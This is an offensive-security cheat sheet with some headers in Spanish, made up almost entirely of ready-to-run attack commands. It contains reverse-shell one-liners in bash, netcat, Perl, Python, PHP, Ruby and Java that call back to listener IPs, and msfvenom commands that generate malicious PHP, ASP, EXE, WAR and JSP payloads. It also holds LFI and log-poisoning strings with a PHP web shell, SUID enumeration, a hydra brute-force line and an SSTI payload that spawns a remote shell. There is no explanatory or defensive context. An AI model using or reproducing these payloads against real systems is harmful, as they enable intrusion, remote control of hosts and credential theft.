#------------------------------REVERSE SHELL-----------------------------------
# NETCAT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 4444 >/tmp/f
# BASH
bash -i >& /dev/tcp/192.168.0.109/4444 0>&1
# PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# PYTHON
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("192.168.0.109",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# RUBY
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# NETCAT
nc -e /bin/sh 10.0.0.1 1234
# NETCAT (Wrong Version)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
# JAVA
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


#-------------------USO DE METASPLOIT PARA LA CREACION DE ARCHIVOS MALICIOSOS--------------------------
#PHP (Metasploit)
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php
#ASP (No Metasploit)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.109 LPORT=443 -f exe  -o shell.exe
#WAR (Sesin via Netcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war
#JSP (Sesin via Netcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp


#---------------------------------------SHELL INTERACTIVA------------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl_z
stty raw -echo
fg
export TERM=screen-256color
stty rows 36 columns 133


#----------------------------------------------------------------------------LFI-----------------------------------------------
http://localhost/lfi.php?file=php://filter/convert.base64-encode/resource=EXAMPLE.php
http://localhost/lfi.php?file=/var/log/auth.log
http://localhost/lfi.php?file=/var/log/apache2/auth.log
%00
?
user-agent : <?php system($_GET['cmd']); ?>




#--------------------------------------------------------FIND-------------------------------------------------------------
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm 4000 print 2>/dev/null


#--------------------------------------------------HYDRA-----------------------------------------------------
hydra -L user.txt -P pass.txt 192.168.0.109 hhtp-post-form "path:data:NotFound"


#----------------------------------------SSTI--------------------------------------------
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.4\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

